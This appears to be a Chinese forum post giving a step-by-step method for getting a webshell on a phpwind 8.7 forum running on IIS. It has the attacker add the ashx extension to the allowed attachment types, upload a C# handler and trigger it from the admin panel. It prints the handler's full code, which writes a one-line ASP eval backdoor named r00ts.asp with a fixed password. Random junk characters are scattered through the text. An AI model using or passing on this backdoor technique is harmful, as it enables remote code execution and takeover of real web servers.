phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

8 z9 p' w" p' m6 Y9 n$ a群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
) b0 Y( b3 B8 H" B  q- o2 P
2 s: l' h- o3 J发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 M, K, T/ e+ U$ b3 F# V- g
  f6 ~0 W# `6 d- T然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts

下面是代码:
" z6 D8 @! p! i0 C; k% c2 j3 B
<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
6 O: ?" y" D# A8 f( Busing System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
1 ^. h) ~+ u+ R, j6 T  Fcontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
file1.Write("<%eval request(\"r00ts\")%>");
* K* x# K! R# Z8 q- \% e, s3 @file1.Flush();
file1.Close();
}
+ w3 _, v1 q/ T9 Jpublic bool IsReusable {
7 W% h! w( i; j. ]4 z. P- v7 ^get {
7 z6 y( N, L! F. G( Sreturn false;
}
+ C; r/ ~' z$ K}
" p4 b( W# [; ^/ G6 B* K6 u}
- ]$ u9 R' y8 B) K7 Y/ B